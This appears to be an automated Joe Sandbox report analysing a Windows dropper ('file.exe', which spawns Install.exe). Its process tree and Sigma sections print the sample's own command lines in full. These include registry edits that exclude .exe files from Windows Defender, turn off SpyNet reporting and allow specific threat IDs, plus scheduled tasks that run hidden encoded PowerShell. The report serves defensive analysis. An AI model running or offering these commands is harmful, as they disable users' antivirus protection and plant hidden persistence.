Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:715145
MD5:2d9b13584ab871c81ff24c473468cffa
SHA1:fc29f8a56d9b3ec01bfe432f83e88585df3aa32d
SHA256:dd1f7353d20b255088e50490aaa88d53d56156842f2d235792f69be05fc3d56f
Tags:exe
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5820 cmdline: C:\Users\user\Desktop\file.exe MD5: 2D9B13584AB871C81FF24C473468CFFA)
    • Install.exe (PID: 5784 cmdline: .\Install.exe MD5: 3ADC95B09B9644E908114624326E8D0B)
      • Install.exe (PID: 5796 cmdline: .\Install.exe /S /site_id "525403" MD5: 6F52A47480DAE7C97A64DD5AEBB8E426)
        • forfiles.exe (PID: 5888 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5960 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 5140 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 4496 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 5868 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4544 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 4668 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 1332 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 1252 cmdline: schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1244 cmdline: schtasks /run /I /tn "gUpzuvmWb" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5956 cmdline: schtasks /DELETE /F /TN "gUpzuvmWb" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5176 cmdline: schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 4744 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 1348 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • fdKxpPd.exe (PID: 5880 cmdline: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S MD5: 6F52A47480DAE7C97A64DD5AEBB8E426)
    • powershell.exe (PID: 5976 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4764 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 5200 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5504 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3020 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5124 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6032 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2332 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6140 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4724 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5536 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1876 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5160 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4816 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5100 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2152 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2200 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4392 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2820 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1516 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5456 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 5480 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • gpscript.exe (PID: 3636 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Persistence and Installation Behavior

barindex
Sigma detected: Schedule system process
Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe, ParentProcessId: 5796, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 1252, ProcessName: schtasks.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeReversingLabs: Detection: 73%
Source: C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exeReversingLabs: Detection: 73%
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\__data__\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\
Source: powershell.exe, 00000011.00000002.489141867.000002054ACA3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.466904968.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.424722343.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.501145246.000002054ACF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000011.00000002.481039344.0000020542CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.391402667.0000020532E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.386721858.0000020532C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.469816880.0000000003A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.391402667.0000020532E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.391402667.0000020532E93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.481039344.0000020542CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.485427050.0000020542E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: reg.exeProcess created: 49

System Summary

barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: Commandline size = 3260
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicyRCYDxJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418FCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FF9A5A71988
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 179 times
Source: file.exe, 00000000.00000002.555995585.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe A506223F4CA78C5C90CA3E02D00A1FEF0E74B7050712C2A5E7EBAA160FA6C879
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
